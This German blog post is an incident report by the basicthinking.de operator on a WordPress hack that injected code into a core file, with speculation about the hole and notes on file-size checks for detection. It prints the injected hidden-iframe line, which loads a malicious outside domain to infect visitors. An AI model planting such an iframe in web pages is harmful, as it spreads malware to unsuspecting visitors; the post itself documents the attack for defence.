soweit, so gut. Das WordPress-Blog unter basicthinking.de ist komplett neu aufgesetzt (siehe Artikel), DB gelöscht, alles soweit kein Problem, war eh egal um die Inhalte, die habe ich ratzfatz wieder drin. Was war?
-
Hacker hat in die Datei wp-includes/template-functions-general.php folgenden Code eingeschleust (links die gehackte Datei, rechts das Original der WP-Version 2.0.7)
(Klick zum Vergrößern) -
Somit wurde folgende Codezeile beim Generieren aller Blogseiten erzeugt:
iframe src=http://googlerank.info width=1 height=1 style=display:none -
Wer die Startseite basicthinking.de mit einem ungeschützten PC besucht hat, vaD über ältere IE-Browser, war geküsst, da er sich damit einen Virus eingfangen hat (denn die infizierte Seite wurde per iframe mit geladen). Ohne dass der User vom vorigen Artikel gewusst hatte, rief er mich rein zufällig vorhin an, seine Tochter habe meine Startseite besucht und danach sei der PC verseucht gewesen. Das hat ihn mehrere Stunden gekostet, den PC wieder neu aufzusetzen. I’m very sorry. Surft man die besagte Domain mit einem sichereren Browser an, zB FF 3, wird die Seite geblockt.
Neue Stellenangebote
Mitarbeiter*in (m/w/d) für Social Media, Öffentlichkeitsarbeit und Städtepartnerschaft (m/w/d)
meinestadt.de in Sachsenheim
Content Creator / Social Media / Marketing (m/w/d)
Delitzscher Schokoladenfabrik GmbH in Delitzsch
Content Creator / Social Media / Marketing (m/w/d)
Halloren Schokoladenfabrik AG in Delitzsch -
Weitere Infos zu der Virenwarnung finden sich in den Kommentaren
-
Und Hintergrund-Infos zur Infektion via WordPress bei Creative Briefing
-
Klar ist, dass der Hacker Lücken in älteren WordPress-Versionen ausgenutzt hat. Das neu aufgesetzte Blog entspricht zwar nun der neuesten Version 2.5x, aber ich mache mir da keine Hoffnungen, dass das nicht hackable ist. So zumindest ist das Herausfiltern des Passwords über das Cookie nicht mehr ganz so easy, sollte der Angreifer Zugriff auf das Cookie bekommen.
-
Es handelt sich dabei offensichtlich nicht um eine nur auf WordPress beschränkte Attacke, die auf spezifische Lücken von WP eingeht: A vulnerability has been identified in phpMyVisites, which could be exploited by attackers to execute arbitrary scripting code. This flaw is due to an input validation error in the „phpmyvisites.php“ script when processing a malformed URL, which could be exploited by attackers to cause arbitrary scripting code to be executed (Quelle). Auch eine weitere Quelle rästelt, wie der Angreifer eingedrungen sein kann. Und soweit ich nun ca. 30 Quellen durchsucht habe, konnte ich nix Vernünftiges finden, was die Lücke angeht. Können also mehrere Lücken sein, verschiedenartige Attacken, usw.. ätzend, diese Unwissenheit.
-
Ach ja, Filecheck (einfach Anzahl Files und Größe der Files kontrollieren!!!) wird nun nicht mehr nur auf Blog-Root und Wp-Content Folder beschränkt, sondern auf wp-admin und wp-include ausgedehnt. Obwohl der Angreifer den Code/das File ebenso an anderer Stelle abladen könnte und eine WP-Funktionsdatei (im include-Folder liegen die ganzen functions) smarterweise so anpasst, dass sie von der Größe her gleich bleibt (schwieriger, aber nicht unmöglich, Verweis auf Funktion außerhalb WP-Folder). Warum? Wie man oben sehen kann, hat der Meister eine Funktionsdatei angesprochen, die über ein Template-File sowieso aufgerufen wird. Hierbei handelte es sich um den Funktionsaufruf get_footer und get_header, die man in der Footer.php und an anderen Stellen (Templatefiles) finden kann. Get_Header? Zuerst wird ein Cookie gesetzt. Dann erst die URL zur verseuchten Domain erzeugt.
